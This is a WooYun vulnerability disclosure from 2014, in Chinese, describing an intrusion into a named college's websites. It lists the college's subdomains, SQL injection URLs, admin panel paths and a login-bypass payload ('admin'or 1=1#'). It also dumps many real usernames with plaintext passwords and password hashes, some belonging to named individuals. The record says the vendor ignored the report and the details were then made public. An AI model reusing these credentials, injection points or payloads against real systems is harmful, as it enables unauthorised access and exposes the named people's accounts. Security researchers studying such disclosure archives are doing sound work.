当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076818

漏洞标题:某学院多处sql注入和弱口令,可getshell和提权和引发整个网段沦陷

相关厂商:CCERT教育网应急响应组

漏洞作者: 路人甲

提交时间:2014-09-22 12:02

修复时间:2014-09-27 12:04

公开时间:2014-09-27 12:04

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-22: 细节已通知厂商并且等待厂商处理中
2014-09-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
一路走好!

详细说明:

主站域名

http://www.ylsy.edu.cn/


PS:以下信息部分站点可能失效,因为管理员发觉了。关闭了部分站点。更改了密码!声明,图片为证
分站多处打包:

http://rw.ylsy.edu.cn                人文学院
http://fzxy.ylsy.edu.cn 政法学院
http://hxx.ylsy.edu.cn/ 化学学院
http://dxxy.ylsy.edu.cn/ 电子与信息工程学院
http://zyx.ylsy.edu.cn/ 中国语言学院
http://sxx.ylsy.edu.cn/ 数字与统计学院
http://tyxy.ylsy.edu.cn/ 体育学院
http://jyjs.ylsy.edu.cn/ 教育科学系
http://wyx.ylsy.edu.cn/ 外语系
http://wlxy.ylsy.edu.cn/ 物理科学与技术学院
http://ysxy.ylsy.edu.cn/ 艺术学院


pswd.png


基本上phpweb的连接都能爆出来不少


phpweb通用万能密码admin'or 1=1#  
存在 /base/install/ 安装向导
http://zygb.ylsy.edu.cn/dhlm/jgsz/jxdw/ 上面11个的快速连接点
http://wyx.ylsy.edu.cn/ 伊犁师范学院
http://wyx.ylsy.edu.cn/news/html/index.php?id=518 注入点
root root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26
ces root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26
wyx root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26
admin xdy1277 管理员 7c6000185258aa0739456af70eb01cce
kangqian dd060606 53631ad8e712f04ba447db2600eca612
shenke shenke123.com 6f3e76ffebd7ffb654704ca82c5ea839
ly ly7686 路玉 67025d48b8101d4e53b91b84fb2b7728
zzgl d301b85302dc20a0cdc961731ae6291d
xsk xsk123 cb8ad8f973202ec824fdcb606f7527e5
zzgl zzgl123
xjk xjk123 cd3970e3cfef2138c93585f05b6d3dcc
http://nic.ylsy.edu.cn/admin/ 后台
http://nic.ylsy.edu.cn/index.php?mid=1 注入点
ptadmin 123456 e10adc3949ba59abbe56e057f20f883e
admin admin123 0192023a7bbd73250516f069df18b500
http://sxx.ylsy.edu.cn/base/admin/index.php 后台
http://yjsc.ylsy.edu.cn/admin/xyeWebEditor/admin/login.asp 编辑器后台
http://yjsc.ylsy.edu.cn/news.asp?id=52 注入点
http://yjsc.ylsy.edu.cn/admin/xycms.asp 后台
admin adminadmin f6fdffe48c908deb0f4c3bd36c032e72
方之恒 123456 e10adc3949ba59abbe56e057f20f883e
http://xbbj.ylsy.edu.cn/admin.php 学报
http://xbbj.ylsy.edu.cn/news/html/index.php?id=511 注入点
xbbj root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26
root
root root3306 F220081DB9063D0B73A6C0ABC3DA26F1A3676C26
admin jiayz089 00dc1abc8fbce8009fdaa138e682477b
caolinhong clh123456 f3594dfd18db621a124313b573bcf1c5
zhangjianguo zjg123456 edd6f69ca19ab9ab5350bb4d06262cbe
何苗苗 hemiaomiao 4241242c913931618d1efd402b55272d


学校的网段也是够强大的(PS:可能切糕生意太好了吧。。。)

QQ截图20140920233337.png


QQ截图20140920235308.png


这个在网站3306端口自动下载就不明白了

sql.png


漏洞证明:

我就传图了。不打字了。好难打。


123.png

QQ截图20140918002530.png

QQ截图20140918003257.png

QQ截图20140918010730.png

QQ截图20140918091441.png

QQ截图20140918092206.png

root.png


此处为某站点实例


QQ截图20140918104152.png

QQ截图20140921001733.png

QQ截图20140921004832.png

修复方案:

总结,学院的网站三大系统
PHPWEB DEDECMS ESPCMS


更新到最新版或者整个网段改造吧,工程大。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-27 12:04

厂商回复:

最新状态:

暂无